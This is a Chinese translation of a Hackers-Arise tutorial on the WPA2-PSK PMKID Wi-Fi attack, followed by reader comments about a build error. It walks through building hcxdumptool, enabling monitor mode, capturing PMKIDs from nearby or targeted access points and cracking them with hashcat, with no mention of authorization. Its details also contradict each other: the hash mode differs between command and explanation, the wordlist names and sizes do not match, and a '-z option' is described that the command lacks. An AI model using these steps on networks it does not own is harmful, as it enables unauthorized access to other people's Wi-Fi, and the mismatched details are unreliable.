Wi-Fi黑客攻击,第11部分:PMKID攻击

原文链接:https://www.hackers-arise.com/post/wi-fi-hacking-part-11-the-pmkid-attack

欢迎回来,我雄心勃勃的网络战士!

如您所知,破解WPA2-PSK的关键是在客户端和AP之间的4向握手中通过空气时捕获PSK(预共享密钥或密码)(您必须处于监视模式才能执行此操作)。这要求我们要么等待客户端连接到 AP,要么如果客户端已经连接,则将客户端关闭(取消身份验证)AP 并等待它们重新连接。

如果我们可以跳过该步骤直接从AP获取密码哈希,该怎么办?这正是PMKID攻击的内容!

这项新技术(2018年8月)是由hashcat的安全研究人员开发的,hashcat是基于Linux的快速密码破解工具。他们正在使用hcxtools存储库中包含的工具以及何时发现一些有趣的东西来研究Wi-Fi黑客攻击。他们发现,他们可以直接从包含 PSK 的 AP 中提取信息,而无需客户端连接到 AP!

让我们看看这个工具是如何工作的,并在一些AP上使用它。

步骤#1:下载并安装hcxdumptool

我们进行此黑客攻击所需的工具不是内置于Kali中,但我们可以从 github.com

首先,我们需要下载hcxtools。

kali > git clone https://github.com/ZerBea/hcxtools.git

接下来,下载 hcxdumptools。

kali > git clone https://github.com/ZerBea/hcxdumptool.git

下载完成后,我们需要制作并安装这些工具中的每一个。

在编译之前,可能需要安装openssl 库文件

apt-get install libssl-dev

导航到新的 hcxdumptool 目录。

kali > cd hcxdumptool

然后运行 make 并 make install

kali>make

kali>make install

然后导航到hcxtools目录并执行相同的操作。

在编译之前,可能需要安装curl4 库文件

apt-get install libcurl4-openssl-dev

kali > cd hcxtools

kali>make

kali>make install

步骤#2:使用airmon-ng将无线适配器置于监视模式

接下来,我们需要从Aircrack-ng Wi-Fi黑客工具套件开始airmon-ng,将我们的无线适配器置于监视模式。

kali > airmon-ng start wlan0

请注意,当airmon-ng启动时,它会将您的无线网卡从wlan0重命名为wlan0mon。

现在,在监视器模式下启动无线适配器上的 airodump-ng。

kali > airodump-ng wlan0mon

步骤#3:使用hcxdumptool捕获PMKID

下一步是使用hcxdumptool走到Wi-Fi AP并获取包含PSK(预共享密钥或密码)的PMKID。

kali > hcxdumptool -i wlan0mon -o Hackers-ArisePMKID –enable_status=1

哪里:

-i 表示 Wi-Fi 适配器(在本例中为 wlan0mon)

-o 表示输出。这是您指定要将 PMKID 写入的文件

–enable_status=1

现在,运行该命令并耐心等待。在某些情况下,可能需要数小时才能获得所有PMKID。正如您在上面的屏幕截图中看到的,hcxdumptool正在抓取并枚举该区域中每个AP的每个PMKID。

步骤#4:捕获单个PMKID

在大多数情况下,您可能不想抓住该地区的所有PMKID,而是专门针对其中一个。为此,我们可以为目标 AP 的 BSSID 添加一个过滤器。

为此,您需要创建一个文本文件,其中包含目标 AP 的唯一 BSSID,没有任何冒号或逗号。你可以做他的使用猫命令,如;

kali> cat> targetBSSID

>aabbccddeeff

使用 CTRL+D 退出 cat。确保第二行包含目标 BSSID,而不是其他任何内容。

现在,这将创建一个目标 BSSID 的简单文本文件,hcxdumptool 可以读取该文件。

现在,要将此筛选器用于单个 AP,我们只需将几个选项附加到上一个命令上。最重要的是,我们添加

–filterlist_ap=targetBSSID

filtermode=2

这两个选项告诉 hcxdumptool 使用 AP BSSID 作为过滤器,并且仅从该单个 AP 捕获 PMKID。

请注意,一段时间后(在某些情况下,几个小时),hcxdumptoool能够捕获单个目标AP的PMKID并将其放入我们的文件“HackersArisePMKID”中!

步骤#5:去除PMKID中所有无关的数据

PMKID包含PSK的哈希值,但也包含许多其他我们不需要或不需要的信息。我们需要去掉这些数据,只留下PSK的哈希值,然后才能开始破解哈希值。为此,我们需要hcxpcapngtool,这是我们之前作为hcxtools的一部分下载的工具组的一部分。

导航到 hcxtool 目录。

kali > cd hcxtools

现在,我们使用hcxpcapngtool来去除该文件中的所有其他信息,只留下PSK哈希值。

kali >hcxpcapngtool -o hashoutput.txt HackersArisePMKID

现在,这将在 -z 选项 hashoutput 之后的文件中留下 PSK 哈希值.txt

步骤#6:破解哈希!

我们的最后一步是破解哈希。我们可以使用我们武器库中的任何密码破解工具(包括john,hashcat和许多其他工具)来做到这一点。在这里,我将使用hashcat使用前10,000个密码作为我的单词列表来破解它。

kali > hashcat -m 22000 hashoutput.txt probable-v2-wpa-top62.txt

哪里:

hashcat是密码哈希破解工具

-m 16800 表示哈希的类型

hashoutput.txt是包含剥离的 PSK 哈希的文件

top100000passwords.txt是一个纯文本文件,包含10,000个最常见的密码

总结

新的PMKID攻击(2018年8月)为我们提供了另一种攻击启用了WPA2-PSK的Wi-Fi AP的方法。这种攻击的美妙之处在于,它不需要我们等待客户端连接并关联或取消身份验证客户端。在我的测试中,当使用hcxdumptool探测时,80-90%的无线AP对PMKID有响应。

有关Wi-Fi黑客攻击的更多信息,请在此处查看我的Wi-Fi黑客攻击系列,或在我们的在线商店中购买Wi-Fi黑客攻击视频。要了解更多信息,请加入我们的用户计划。

2人评论了“Wi-Fi黑客攻击,第11部分:PMKID攻击”

  1. 我执行了make就提示:make: pkg-config: 没有那个文件或目录
    make: pkg-config: 没有那个文件或目录
    cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxdumptool.d -o hcxdumptool hcxdumptool.c -DVERSION_TAG=\”6.2.8-6-gfe9087b\” -DVERSION_YEAR=\”2023\”
    hcxdumptool.c:44:10: fatal error: openssl/conf.h: 没有那个文件或目录
    44 | #include
    | ^~~~~~~~~~~~~~~~
    compilation terminated.
    make: *** [Makefile:75:hcxdumptool] 错误 1

    1. 这个错误通常意味着您需要安装 pkg-config 工具,该工具用于在编译时检索库的信息。您可以尝试使用以下命令在 Ubuntu 上安装它:
      sudo apt-get update
      sudo apt-get install pkg-config

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

滚动至顶部